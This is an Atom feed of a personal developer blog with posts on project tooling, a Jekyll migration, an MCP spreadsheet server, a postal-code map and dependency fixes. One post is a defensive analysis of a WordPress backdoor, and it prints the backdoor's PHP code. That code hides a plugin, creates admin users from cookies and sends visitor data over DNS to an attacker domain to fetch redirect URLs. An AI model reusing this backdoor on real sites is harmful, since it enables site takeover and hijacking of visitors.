<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" xml:lang="cs"><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://marekrost.cz/feed.xml" rel="self" type="application/atom+xml" /><link href="https://marekrost.cz/" rel="alternate" type="text/html" hreflang="cs" /><updated>2026-03-06T14:29:53+00:00</updated><id>https://marekrost.cz/feed.xml</id><title type="html">Marek Rost</title><subtitle>Personal Blog</subtitle><author><name>Marek Rost</name></author><entry><title type="html">Sequentia PM: Git-Native Project Management for Human-AI Collaboration</title><link href="https://marekrost.cz/sequentia-pm/" rel="alternate" type="text/html" title="Sequentia PM: Git-Native Project Management for Human-AI Collaboration" /><published>2026-03-06T00:00:00+00:00</published><updated>2026-03-06T00:00:00+00:00</updated><id>https://marekrost.cz/sequentia-pm</id><content type="html" xml:base="https://marekrost.cz/sequentia-pm/"><![CDATA[<p>Most project management tools want to be everything for everyone. They pile on features, dashboards, integrations, and collaboration modes until the tool itself becomes the project you need to manage. Meanwhile, the way we build software is shifting: Small teams where a human steers and AI agents do much of the heavy lifting are becoming the norm. <a href="https://github.com/marekrost/sequentia-pm">Sequentia PM</a> is built for exactly this setup.</p>

<h2 id="the-idea">The idea</h2>

<p>Sequentia PM is a desktop application that turns an ordinary folder of numbered files into a full project management workspace. There is no database, no cloud sync, no account to create. Your project is a directory. The files inside it (Markdown, CSV, DBML) are the single source of truth: readable by any text editor, diffable by Git, and accessible to humans and AI agents alike.</p>

<p>The naming convention is dead simple: prefix each file with a two-digit number and a dash, and Sequentia picks it up as a tab. As a demonstration, the application itself is managed this way: <code class="language-plaintext highlighter-rouge">00-process.md</code> becomes your process definition, <code class="language-plaintext highlighter-rouge">03-backlog.csv</code> your backlog spreadsheet, <code class="language-plaintext highlighter-rouge">08-models.dbml</code> your entity-relationship diagram. Add a file, get a tab. Remove it, lose the tab. No configuration needed.</p>
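<p>As an illustrative sketch (plain Python, not Sequentia’s actual TypeScript), the tab-discovery rule can be expressed in a few lines; the file names below come from the examples above:</p>

```python
import re

# The convention from the post: a two-digit prefix and a dash make a file a tab.
TAB_PATTERN = re.compile(r"^(\d{2})-.+")

def discover_tabs(filenames):
    """Return (sequence, filename) pairs for conforming files, ordered by prefix."""
    tabs = []
    for name in filenames:
        match = TAB_PATTERN.match(name)
        if match:
            tabs.append((int(match.group(1)), name))
    return sorted(tabs)

# Non-conforming files (notes.txt) simply never become tabs.
print(discover_tabs(["03-backlog.csv", "00-process.md", "notes.txt", "08-models.dbml"]))
```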

<p>This plain-text, file-per-concern layout is not just a design preference; in my opinion, it is what makes human-AI collaboration practical. An AI agent can read, edit, and commit project files through the same Git workflow a human uses. No API tokens, no integrations, no special access. The project folder sits directly in the shared workspace.</p>

<p>There is another kind of minimalism at play here: the first file in the sequence is your process definition, which doubles as instructions for your AI agent on how you want the project managed. And because the structure carries no assumptions about what you are building, it works just as well for a hardware product, a marketing campaign, or an event plan as it does for software. Swap the process file, adjust the backlog columns, and you have a different methodology for a different domain.</p>

<p>Because everything is just files in a repo, context-switching between projects is trivial. Waiting on a vendor, a customer estimate, or feedback? Commit, switch branches, move on. When it is time to pick up again, the entire project state is right where you left it.</p>

<h2 id="technology-under-the-hood">Technology under the hood</h2>

<p>The stack is deliberately compact:</p>

<ul>
  <li><strong>Electron + React 19 + TypeScript</strong> for the desktop shell</li>
  <li><strong>Monaco Editor</strong> for Markdown and DBML editing with syntax highlighting</li>
  <li><strong>react-data-grid + HyperFormula</strong> for the CSV spreadsheet editor, complete with formulas, sorting, and multi-cell copy/paste</li>
  <li><strong>@softwaretechnik/dbml-renderer</strong> for live SVG entity-relationship diagrams</li>
  <li><strong>Zustand</strong> for state management in roughly 75 lines</li>
  <li><strong>chokidar</strong> for watching external file changes</li>
</ul>

<p>The entire application logic clocks in at around 560 lines of code. The architecture is a clean three-layer sandwich: an Electron main process handling privileged file I/O, a sandboxed preload bridge exposing exactly 20 IPC methods, and a React renderer that never touches the filesystem directly.</p>

<p>An <code class="language-plaintext highlighter-rouge">EditorRouter</code> component maps file extensions to purpose-built editors - <code class="language-plaintext highlighter-rouge">.md</code> opens the Markdown editor with a live preview pane, <code class="language-plaintext highlighter-rouge">.csv</code> opens the spreadsheet, <code class="language-plaintext highlighter-rouge">.dbml</code> opens the diagram editor. Everything else gets a polite notice that no editor is available yet.</p>
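<p>A hypothetical sketch of the routing rule (the real <code class="language-plaintext highlighter-rouge">EditorRouter</code> is a React component; the editor names here are illustrative):</p>

```python
import os

# Illustrative mapping of extension to editor; names are made up, the real
# component dispatches to React editors rather than returning strings.
EDITORS = {
    ".md": "markdown+preview",
    ".csv": "spreadsheet",
    ".dbml": "er-diagram",
}

def route(filename):
    """Pick an editor by extension; unknown types get the 'no editor' notice."""
    ext = os.path.splitext(filename)[1].lower()
    return EDITORS.get(ext, "no-editor-notice")

print(route("08-models.dbml"))
```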

<h2 id="less-is-more-by-design">Less is more, by design</h2>

<p>What makes Sequentia interesting is not what it does, but what it refuses to do. The project’s design principles spell this out explicitly:</p>

<ul>
  <li><strong>Air-gapped by default.</strong> Zero network calls, zero telemetry, zero CDN fetches. All libraries are bundled at build time. The app works identically on an airplane and behind a corporate firewall.</li>
  <li><strong>No artifacts left behind.</strong> The application creates nothing in your project directory - no <code class="language-plaintext highlighter-rouge">.sequentia/</code> config folder, no lock files, no metadata. It reads and writes only the files you created.</li>
  <li><strong>Open formats only.</strong> Markdown, CSV, and DBML are plain text. Your data stays yours, editable in vim, diffable in Git, greppable from the terminal.</li>
  <li><strong>Single-window simplicity.</strong> One project, one window, one tab bar. No workspaces, no multi-project views, no nesting. The complexity ceiling is deliberately low.</li>
</ul>

<p>This is a conscious rejection of the feature-accumulation treadmill. Instead of asking “what else can we add?”, Sequentia asks “what can we leave out and still have a useful tool?”</p>

<p>The project folder itself is self-documenting. The <code class="language-plaintext highlighter-rouge">00-process.md</code> file defines the entire methodology: file sequence, tiered immutability levels (frozen charters, baselined backlogs, living task lists), and change management rules. The tool and the process it supports are one and the same.</p>

<h2 id="built-for-human-ai-teams">Built for human-AI teams</h2>

<p>Sequentia’s process definition doesn’t just describe the methodology for humans: it explicitly governs AI agents too. The tiered immutability system doubles as a permission model: AI agents can freely update living files like tasks and schedules (Tier 3), must flag proposed changes to baselined backlogs and estimates (Tier 2), and are forbidden from touching frozen process documents and charters (Tier 1) without explicit human approval.</p>
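<p>The tier rules can be sketched as a tiny permission check. The tier assignments for <code class="language-plaintext highlighter-rouge">00-process.md</code> and <code class="language-plaintext highlighter-rouge">03-backlog.csv</code> follow the description above, while <code class="language-plaintext highlighter-rouge">05-tasks.csv</code> and the function names are hypothetical:</p>

```python
# Hypothetical sketch of the tiered-immutability rules described above.
TIERS = {
    "00-process.md": 1,   # Tier 1: frozen, explicit human approval required
    "03-backlog.csv": 2,  # Tier 2: baselined, proposed changes must be flagged
    "05-tasks.csv": 3,    # Tier 3: living, agents may update freely
}

def agent_action(filename):
    """Map a file's tier to what an AI agent is allowed to do with it."""
    tier = TIERS.get(filename, 3)
    if tier == 1:
        return "escalate"
    if tier == 2:
        return "propose"
    return "edit"

print(agent_action("03-backlog.csv"))
```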

<p>This is a practical answer to a real problem. When an AI agent works on your project, it needs to understand not just the code but the project structure, constraints, and rules. With Sequentia, all of that context lives in the same directory the agent is already working in. Point an agent at the folder, and it has everything it needs - the process, the backlog, the data model, the task list - in formats it can parse without any special tooling.</p>

<p>The result is a lightweight governance layer for human-AI collaboration. The human defines the vision, constraints, and priorities. The AI executes within those boundaries, updates what it is allowed to update, and escalates what it is not. No SaaS platform required - just files, Git, and clear rules.</p>

<h2 id="why-not-just-vs-code">Why not just VS Code?</h2>

<p>Fair question. The files are plain text, so you could open the folder in VS Code and edit everything there. In practice, that means installing a Markdown preview extension, a CSV editor extension, a DBML renderer, hoping they play well together, and accepting whatever UI each one decides to give you. It works, but it is duct tape.</p>

<p>Sequentia gives you a coherent interface out of the box. More importantly, it makes the process sequence visible. The numbered tabs are not just an organizational trick - they represent a dependency chain. A charter comes before a backlog, a backlog comes before estimates, estimates come before a schedule. When a junior PM or developer opens the project, they see this structure immediately and can understand the impact of their changes: touching an early file cascades through everything downstream.</p>

<p>This matters because Sequentia is not just a tool for experienced project managers. It is a learning environment. Junior developers and PMs can use it to understand how structured project management actually works - how a charter constrains a backlog, how a backlog drives estimates, how estimates feed a schedule. The numbered sequence teaches the discipline by making it tangible.</p>

<p>And frankly, that is where this tool finds its sharpest edge. The industry conversation right now is that entire cohorts of junior developers are becoming replaceable by AI. Sequentia offers an alternative path: instead of competing with AI at writing code, learn to manage projects and direct AI agents. The tool is designed to make that transition accessible - a junior who understands project structure and can steer AI agents effectively is far more valuable than one who only writes code an LLM can produce faster.</p>

<h2 id="who-is-this-for">Who is this for?</h2>

<p>Sequentia fits small human-AI teams - a developer or two steering the direction, with AI agents handling implementation, research, and routine updates. If you already live in Git and work with coding agents like Claude Code, Cursor, or Copilot, Sequentia gives your project the structure these agents need to be effective contributors rather than isolated tools. It is project management that both you and your AI can read, write, and commit to.</p>

<p>It ships as AppImage, deb, and Flatpak on Linux, with NSIS installer and portable builds for Windows. The project is GPL-3.0 licensed and still an early version, but the core feature set is already usable.</p>

<p>Check it out on <a href="https://github.com/marekrost/sequentia-pm">GitHub</a>.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[Most project management tools want to be everything for everyone. They pile on features, dashboards, integrations, and collaboration modes until the tool itself becomes the project you need to manage. Meanwhile, the way we build software is shifting: Small teams where a human steers and AI agents do much of the heavy lifting are becoming the norm. Sequentia PM is built for exactly this setup.]]></summary></entry><entry><title type="html">Moving from Bludit to Jekyll</title><link href="https://marekrost.cz/moving-from-bludit-to-jekyll/" rel="alternate" type="text/html" title="Moving from Bludit to Jekyll" /><published>2026-02-25T00:00:00+00:00</published><updated>2026-02-25T00:00:00+00:00</updated><id>https://marekrost.cz/moving-from-bludit-to-jekyll</id><content type="html" xml:base="https://marekrost.cz/moving-from-bludit-to-jekyll/"><![CDATA[<p>For years this blog ran on <a href="https://www.bludit.com/">Bludit</a>, a flat-file CMS written in PHP. It served me well: no database to manage, simple deployment, and a decent admin UI. However, my workflow has changed significantly over the last two years, and the time has come to move on.</p>

<p>I migrated everything to <a href="https://jekyllrb.com/">Jekyll</a>, a static-site generator written in Ruby. The switch was surprisingly smooth. Since my content was already in Markdown, the migration was mostly about co-locating files, fixing occasional legacy HTML, and normalizing YAML front matter.</p>

<p>A few things I like about the new setup:</p>

<ul>
  <li><strong>Post bundles</strong>: With minor configuration adjustments to Jekyll, each post now lives in its own directory alongside its images and assets, keeping everything self-contained and easy to manage.</li>
  <li><strong>Full control</strong>: The entire site lives in a Git repository. No admin panel, no PHP runtime, just Markdown and Liquid templating.</li>
  <li><strong>Automated deployment</strong>: A GitHub Actions workflow builds and deploys the site on every push. No server to maintain.</li>
  <li><strong>Lower attack surface</strong>: Without a database or active runtime, there is practically nothing to exploit.</li>
</ul>

<p>The blog is leaner, faster, and easier to work with. If you are running a small personal site and find yourself fighting your CMS more than writing, a static generator might be worth a look.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[For years this blog ran on Bludit, a flat-file CMS written in PHP. It served me well: no database to manage, simple deployment, and a decent admin UI. However, my workflow has changed significantly over the last two years, and the time has come to move on.]]></summary></entry><entry><title type="html">Building mcp-server-spreadsheet: A Data-First MCP Server for Excel</title><link href="https://marekrost.cz/mcp-server-spreadsheet/" rel="alternate" type="text/html" title="Building mcp-server-spreadsheet: A Data-First MCP Server for Excel" /><published>2026-02-24T00:00:00+00:00</published><updated>2026-02-24T00:00:00+00:00</updated><id>https://marekrost.cz/mcp-server-spreadsheet</id><content type="html" xml:base="https://marekrost.cz/mcp-server-spreadsheet/"><![CDATA[<p><strong>UPDATE 2026-03-01:</strong> I’ve extended the functionality to cover .csv, .ods, .xlsx file formats.</p>

<p>I needed a stateless MCP server with dual-mode Excel file access: cell-level and SQL. Nothing quite fit my requirements, and once I had formed the specification of what exactly I needed, the simplest path was to build one.</p>

<p>Before writing any code, I sat down and declared what I actually needed: a stateless MCP server that can do both precise cell-level operations and SQL-powered queries on .xlsx files, with both modes working interleaved on the same workbook.</p>

<p>With the spec in hand, I looked at what already exists, mostly with Gemini’s help. I tested <a href="https://github.com/negokaz/excel-mcp-server">excel-mcp-server</a> and <a href="https://github.com/ChrisGVE/localdata-mcp">localdata-mcp</a>. Both are functional, but neither fit. They burned through the context window with verbose outputs and long tool descriptions. They also lacked the dual operational mode I was after. When your LLM agent wastes tokens on session management or reformatting data it already has, you feel it in every conversation.</p>

<p>So I built my own. <a href="https://github.com/marekrost/mcp-server-spreadsheet">mcp-server-spreadsheet</a> is a single-file Python server offering 26 tools across two modes:</p>

<ul>
  <li>direct cell operations via openpyxl (read, write, copy, search) and</li>
  <li>a DuckDB-powered SQL interface supporting JOINs, aggregates, and even INSERT/UPDATE/DELETE with atomic writeback.</li>
</ul>
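<p>The atomic-writeback idea behind the SQL mode can be sketched in a few lines of Python; this is an illustration of the temp-file-plus-<code class="language-plaintext highlighter-rouge">os.replace()</code> technique, not the server’s actual code:</p>

```python
import os
import tempfile

def atomic_write(path, data):
    """Write data to a temp file in the same directory, then os.replace()
    it over the target, so a crash mid-write never leaves a half-written
    workbook behind."""
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp_path = tempfile.mkstemp(dir=directory)
    try:
        with os.fdopen(fd, "wb") as tmp:
            tmp.write(data)
        os.replace(tmp_path, path)  # atomic rename on POSIX and Windows
    except BaseException:
        os.unlink(tmp_path)
        raise

# Demo against a throwaway path.
target = os.path.join(tempfile.mkdtemp(), "demo.xlsx")
atomic_write(target, b"workbook bytes")
```

The temp file lives in the target’s own directory so the final rename never crosses a filesystem boundary, which is what keeps it atomic.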

<p>The worksheet mode deals with raw content and ignores styling. The SQL mode is as raw as it can get. Every LLM understands the language out of the box, so why provide a plethora of tools with needless descriptions? Every call is stateless: explicit file and sheet parameters, no handles, no sessions. Writes go through temp files with os.replace() for crash safety. Formulas come back as actual formula strings, not cached values. The design is deliberately minimal: data in, data out, no formatting side-effects, no wasted tokens.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[UPDATE 2026-03-01: I’ve extended the functionality to cover .csv, .ods, .xlsx file formats.]]></summary></entry><entry><title type="html">An Interactive Map of Czech Postal Codes</title><link href="https://marekrost.cz/interaktivni-mapa-psc-ceske-republiky/" rel="alternate" type="text/html" title="An Interactive Map of Czech Postal Codes" /><published>2026-01-16T00:00:00+00:00</published><updated>2026-01-16T00:00:00+00:00</updated><id>https://marekrost.cz/interaktivni-mapa-psc-ceske-republiky</id><content type="html" xml:base="https://marekrost.cz/interaktivni-mapa-psc-ceske-republiky/"><![CDATA[<p>A map of postal codes (PSČ) in the Czech Republic cannot simply be downloaded. And paying recurring fees these days for something I could probably automate myself with a bit of vibe coding did not sit well with me. And so this <a href="https://mapa-psc.marekrost.cz/">one-day project</a> was born.</p>

<h2 id="motivace-a-cíle">Motivation and goals</h2>

<p>A PSČ is not an official territorial unit; it is a delivery attribute assigned to individual address points. No official PSČ map therefore exists, and the Czech Post does not even attempt to provide one. At <a href="https://www.tritonit.cz/">Triton IT</a>, however, we needed one for shipping zone planning with a customer. The goal of the project was to provide a publicly available map on which a user can quickly see which PSČ covers a particular area. No registration, no payments, no backend; a purely static web page hostable on GitHub Pages.</p>

<p>The only reliable source is RÚIAN (the Register of Territorial Identification, Addresses and Real Estate) maintained by ČÚZK. It contains roughly 3 million address points, each with an assigned PSČ and coordinates in the S-JTSK system. The areal boundaries of individual PSČ had to be derived from this point data.</p>

<h2 id="hledání-správného-algoritmu">Finding the right algorithm</h2>

<h3 id="pokus-první-alpha-shapes-konkávní-obálky">Attempt one: Alpha Shapes (concave hulls)</h3>

<p>The first version used the Alpha Shapes algorithm: concave hulls that follow the actual shape of built-up areas better than a simple convex hull. An adaptive alpha parameter varied with point density: a lower value for urban areas (a tighter outline), a higher one for rural areas.</p>

<p><strong>The problem:</strong> Gaps appeared between individual PSČ areas, a “no man’s land” assigned to no area. Visually unpleasant and practically confusing.</p>

<h3 id="pokus-druhý-delaunay-triangulace">Attempt two: Delaunay triangulation</h3>

<p>The second approach used Delaunay triangulation with edge filtering. It could generate hollow and concave shapes, but the gaps between PSČ areas persisted.</p>

<h3 id="finální-řešení-voronoi-tessellation">Final solution: Voronoi tessellation</h3>

<p>We returned to the approach used, for example, by Google Maps. A Voronoi diagram assigns each address point a cell containing the space nearest to it. Cells with the same PSČ are merged, and the boundaries are smoothed with the Douglas-Peucker algorithm.</p>

<p><strong>Advantages of the Voronoi approach:</strong></p>

<ul>
  <li>It fills the entire space without gaps</li>
  <li>Boundaries are natural, running exactly midway between neighboring addresses</li>
  <li>Adjacency between areas is clearly defined</li>
</ul>

<p>For isolated addresses (1-2 points), a circular buffer is used as a fallback.</p>
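<p>A minimal pure-Python sketch of the Douglas-Peucker simplification step mentioned above (illustrative only; the project’s pipeline has its own implementation):</p>

```python
def perpendicular_distance(p, a, b):
    """Distance from point p to the line through a and b."""
    (px, py), (ax, ay), (bx, by) = p, a, b
    dx, dy = bx - ax, by - ay
    if dx == dy == 0:
        return ((px - ax) ** 2 + (py - ay) ** 2) ** 0.5
    return abs(dy * px - dx * py + bx * ay - by * ax) / (dx * dx + dy * dy) ** 0.5

def douglas_peucker(points, epsilon):
    """Simplify a polyline, keeping only points farther than epsilon from
    the chord between the current endpoints."""
    if len(points) < 3:
        return points
    index, dmax = 0, 0.0
    for i in range(1, len(points) - 1):
        d = perpendicular_distance(points[i], points[0], points[-1])
        if d > dmax:
            index, dmax = i, d
    if dmax > epsilon:
        left = douglas_peucker(points[: index + 1], epsilon)
        right = douglas_peucker(points[index:], epsilon)
        return left[:-1] + right
    return [points[0], points[-1]]

# A nearly straight line collapses to its endpoints.
print(douglas_peucker([(0, 0), (1, 0.05), (2, -0.05), (3, 0)], 0.1))
```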

<h2 id="barevné-rozlišení-sousedů">Color-coding neighbors</h2>

<p>For the map to be readable, adjacent PSČ areas must have different colors. The Welsh-Powell greedy graph-coloring algorithm takes care of this. The result is a palette of just 4 colors (in line with the four color theorem), in which no two adjacent PSČ areas share a color.</p>
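<p>A small self-contained sketch of the Welsh-Powell greedy coloring (illustrative; the PSČ codes in the toy adjacency below are made up):</p>

```python
def welsh_powell(adjacency):
    """Greedy graph coloring: visit vertices in order of decreasing degree,
    giving each the lowest color unused by its already-colored neighbors."""
    order = sorted(adjacency, key=lambda v: len(adjacency[v]), reverse=True)
    colors = {}
    for v in order:
        used = {colors[n] for n in adjacency[v] if n in colors}
        color = 0
        while color in used:
            color += 1
        colors[v] = color
    return colors

# Toy adjacency of four ZIP areas.
neighbors = {
    "10100": {"10200", "11000"},
    "10200": {"10100", "11000"},
    "11000": {"10100", "10200", "12000"},
    "12000": {"11000"},
}
colors = welsh_powell(neighbors)
# No two neighboring areas share a color.
assert all(colors[a] != colors[b] for a in neighbors for b in neighbors[a])
```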

<h2 id="architektura">Architecture</h2>

<p>The project is split into two parts:</p>

<ol>
  <li><strong>Offline ETL pipeline</strong> (Python) - the computationally heavy data processing</li>
  <li><strong>Static web frontend</strong> - vector tiles (MVT) + MapLibre GL JS</li>
</ol>

<p>The data are transformed from S-JTSK coordinates to WGS84, polygons are generated, and vector tiles are then built with the tippecanoe tool. The output is a folder of static files that can be uploaded to any hosting.</p>

<h2 id="závěr">Conclusion</h2>

<p>After three iterations of the algorithm, we converged on Voronoi tessellation as the best solution for deriving PSČ boundaries from point data. The map is now available at <a href="https://mapa-psc.marekrost.cz/">mapa-psc.marekrost.cz</a> and the <a href="https://github.com/marekrost/mapa-psc">source code</a> is open under the GPL-3.0 license.</p>

<p>The displayed boundaries are by nature an approximation. Actual PSČ membership is always defined only for specific address points. The map serves for orientation and visualization, not as an official reference.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[A map of postal codes (PSČ) in the Czech Republic cannot simply be downloaded. And paying recurring fees these days for something I could probably automate myself with a bit of vibe coding did not sit well with me. And so this one-day project was born.]]></summary></entry><entry><title type="html">WP backdoors delivered via code snippets</title><link href="https://marekrost.cz/wp-backdoors-via-code-snippets/" rel="alternate" type="text/html" title="WP backdoors delivered via code snippets" /><published>2024-07-22T00:00:00+00:00</published><updated>2024-07-22T00:00:00+00:00</updated><id>https://marekrost.cz/wp-backdoors-via-code-snippets</id><content type="html" xml:base="https://marekrost.cz/wp-backdoors-via-code-snippets/"><![CDATA[<p>We have recently encountered a creative way of hiding exploits on WP sites: using plugins that provide custom PHP code snippets. This article should serve as a warning that such plugins are inherently a security risk and should be avoided on all WordPress sites whenever possible.</p>

<h2 id="process-of-the-attack">Process of the Attack</h2>

<ol>
  <li><strong>Initial Access</strong>: The attacker leverages admin-level privileges, potentially obtained through existing exploits or vulnerabilities, to install a code snippet plugin from the official source on WordPress.org.</li>
  <li><strong>Concealment</strong>: The attacker creates a code snippet that conceals the presence of the plugin. This is achieved by masking all related information via CSS and by immediately unloading the plugin using a WordPress action hook.</li>
  <li><strong>Execution</strong>: The malicious payload is automatically executed on every page request.</li>
</ol>

<h2 id="example-of-backdoor-code">Example of backdoor code</h2>

<p>We’ve lifted the following demonstration out of an infected website. The code has been slightly modified and clarifications added.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Attacker's personal password
$_pwsa = 'password_string';

// Hide the presence of the WPCode plugin
if (current_user_can('administrator') &amp;&amp; !array_key_exists('show_all', $_GET)) {
  add_action('admin_print_scripts', function () {
    echo '&lt;style&gt;';
    ...
    echo '&lt;/style&gt;';
  });
  add_filter('all_plugins', function ($plugins) {
    unset($plugins['insert-headers-and-footers/ihaf.php']);
    return $plugins;
  });
}

if (!function_exists('_red')) {

  // Helper function, extract base64-encoded cookie values
  function _gcookie($n) {
    return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : '';
  }

  // Exploit control section
  // Test if visiting browser has the password cookie set to correct value
  if (!empty($_pwsa) &amp;&amp; _gcookie('pw') === $_pwsa) {

    // Command options
    switch (_gcookie('c')) {

      // Update domain storage hidden within wordpress option
      case 'sd':
        $d = _gcookie('d');
        if (strpos($d, '.') &gt; 0) {
          update_option('d', $d);
        }
        break;

      // Add administrator user to the WP site
      // username, password and e-mail fields are defined by u,p,e cookies
      case 'au':
        $u = _gcookie('u');
        $p = _gcookie('p');
        $e = _gcookie('e');
        if ($u &amp;&amp; $p &amp;&amp; $e &amp;&amp; !username_exists($u)) {
          $user_id = wp_create_user($u, $p, $e);
          $user = new WP_User($user_id);
          $user-&gt;set_role('administrator');
        }
        break;
    }
    return;
  }

  // Skip further code on the login page to avoid detection
  if (@stripos(wp_login_url(), ''.$_SERVER['SCRIPT_NAME']) !== false) { return; }

  // Skip further code if specific cookie is present
  if (_gcookie("skip") === "1") { return; }

  // Helper functions
  function _is_mobile() { ... }
  function _is_iphone() { ... }
  function _user_ip()   { ... }

  function _red() {

    // Do nothing for logged in users to avoid detection
    if (is_user_logged_in()) { return; }

    // Do nothing if IP is not set, likely to avoid detection when run via tool like WP CLI
    $ip = _user_ip(); if (!$ip) { return; }

    // Get WP transient option that stores list of visitor IP addresses
    $exp = get_transient('exp'); if (!is_array($exp)) { $exp = array(); }

    // Remove IP address from the list if 24 hours have passed since the last visit
    foreach ($exp as $k =&gt; $v) { if (time() - $v &gt; 86400) { unset($exp[$k]); } }

    // Do nothing more if IP address has visited within last 24 hours
    if (key_exists($ip, $exp) &amp;&amp; (time() - $exp[$ip] &lt; 86400)) { return; }

    // Save website hostname and ip address of the visitor
    $host = filter_var(parse_url('https://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
    $ips = str_replace(':', '-', $ip); $ips = str_replace('.', '-', $ips);

    // Take attacker's contact domain out of WP option
    $h = 'cdn-routing.com';
    $o = get_option('d');
    if ($o &amp;&amp; strpos($o, '.') &gt; 0) { $h = $o; }

    // Prepare DNS request - package info about the current website into subdomains
    $m = _is_iphone() ? 'i' : 'm'; $req = (!$host ? 'unk.com' : $host) . '.' . (!$ips ? '0-0-0-0' : $ips) . '.' . mt_rand(100000, 999999) . '.' . (_is_mobile() ? 'n' . $m : 'nd') . '.' . $h;

    // Send the DNS request: get redirect URL and provide heartbeat
    $s = null;
    try {
      $v = "d" . "ns_" . "get" . "_rec" . "ord";
      $s = @$v($req, DNS_TXT);
    } catch (\Throwable $e) { } catch (\Exception $e) { }

    // Redirect visitor to the domain name in the attacker's DNS TXT record
    // Log the IP into storage
    if (is_array($s) &amp;&amp; !empty($s)) {
      if (isset($s[0]['txt'])) {
        $s = $s[0]['txt'];
        $s = base64_decode($s);
        if ($s == 'err') {
          $exp[$ip] = time();
          delete_transient('exp');
          set_transient('exp', $exp);
        } else if (substr($s, 0, 4) === 'http') {
          $exp[$ip] = time();
          delete_transient('exp');
          set_transient('exp', $exp);
          wp_redirect($s);
          exit;
        }
      }
    }
  }
  add_action('init', '_red');
}
</code></pre></div></div>

<p>The code shown above grants the attacker the ability to redirect visitors of the website to any other domain he wishes. The backdoor allows switching the control domain in order to support migration of the attacker’s own infrastructure. Finally, the attacker can, at any point, create his own admin-level user on the website and use it at his leisure - possibly improving the backdoor or adding more malicious code.</p>

<h2 id="thoughts-on-detection">Thoughts on detection</h2>

<p>This kind of malicious code can be much more difficult to locate than exploits embedded within files on disk, as the latter can be identified simply by tracking file differences.</p>

<p>Basic security tools either don’t scan the WP database or don’t do so sufficiently well. We tested whether the code shown earlier would get detected by Wordfence. It wouldn’t. This means that exploits hidden within snippet plugins easily escape automated detection.</p>

<p>In this particular case, detection can be as simple as comparing the list of installed plugins visible in the administration to the contents of the wp-content/plugins/ folder. Should the folder contain any plugin slugs that do not correspond to what is visible inside the WordPress administration, a detailed investigation should follow. This is, however, hard to automate reliably because of the exploit’s different behavior when run via a CLI tool.</p>
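<p>A sketch of that comparison in Python. The paths and the source of the visible-plugin list are assumptions - the list might come from the admin screen, or from <code class="language-plaintext highlighter-rouge">wp plugin list --field=name</code> with the CLI caveat above in mind:</p>

```python
import os
import tempfile

def hidden_plugin_slugs(plugins_dir, visible_slugs):
    """Return plugin directories present on disk but absent from the list
    the WordPress administration reports - candidates for review."""
    on_disk = {
        entry for entry in os.listdir(plugins_dir)
        if os.path.isdir(os.path.join(plugins_dir, entry))
    }
    return sorted(on_disk - set(visible_slugs))

# Demo: a throwaway directory standing in for wp-content/plugins/.
demo = tempfile.mkdtemp()
for slug in ("akismet", "insert-headers-and-footers"):
    os.mkdir(os.path.join(demo, slug))
print(hidden_plugin_slugs(demo, ["akismet"]))  # the concealed plugin stands out
```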

<p>The easiest approach to detection could simply be maintaining a plugin graylist: a list of potentially exploitable plugins that, when installed, require additional review.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[We have recently encountered a creative way of hiding exploits on WP sites: using plugins that provide custom PHP code snippets. This article should serve as a warning that such plugins are inherently a security risk and should be avoided on all WordPress sites whenever possible.]]></summary></entry><entry><title type="html">selenium-wire: How to resolve No module named blinker._saferef</title><link href="https://marekrost.cz/selenium-wire-how-to-resolve-blinker-saferef/" rel="alternate" type="text/html" title="selenium-wire: How to resolve No module named blinker._saferef" /><published>2024-05-01T00:00:00+00:00</published><updated>2024-05-01T00:00:00+00:00</updated><id>https://marekrost.cz/selenium-wire-how-to-resolve-blinker-saferef</id><content type="html" xml:base="https://marekrost.cz/selenium-wire-how-to-resolve-blinker-saferef/"><![CDATA[<p>Out of nowhere all of our Python projects that utilize selenium-wire suddenly stopped working when redeployed. It turns out that <strong>selenium-wire</strong> is no longer maintained as of January 2024, and the project depends on the package <strong>blinker</strong>, specifically the module <strong>blinker._saferef</strong>, which is no longer available in the latest blinker versions 1.8.0 and 1.8.1.</p>

<p>The solution is to add a direct dependency on blinker&lt;1.8.0 to your project, preventing selenium-wire from automatically pulling in the latest blinker version.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[Out of nowhere all of our Python projects that utilize selenium-wire suddenly stopped working when redeployed. It turns out that selenium-wire is no longer maintained as of January 2024 and the project depends on package blinker, specifically file blinker._saferef that is no longer available in latest blinker versions 1.8.0 and 1.8.1.]]></summary></entry><entry><title type="html">Managing zip files with PHP composer</title><link href="https://marekrost.cz/managing-zip-files-with-php-composer/" rel="alternate" type="text/html" title="Managing zip files with PHP composer" /><published>2024-02-06T00:00:00+00:00</published><updated>2024-02-06T00:00:00+00:00</updated><id>https://marekrost.cz/managing-zip-files-with-php-composer</id><content type="html" xml:base="https://marekrost.cz/managing-zip-files-with-php-composer/"><![CDATA[<p>We have recently moved all Wordpress-based development in Triton IT to Bedrock by Roots.io. One of the perks of this system is the ability to manage all external code with PHP composer. What is the only caveat?</p>

<p>It’s the management of non-public external code and private packages. Paid WordPress plugins in particular turned out to be annoying. We needed them versioned and managed without committing them directly to our own code repository.</p>

<p>While looking for a solution, I found <a href="https://github.com/Rarst/release-belt">Release Belt</a>, a nice little application that can manage ZIP files as if they were composer packages.</p>

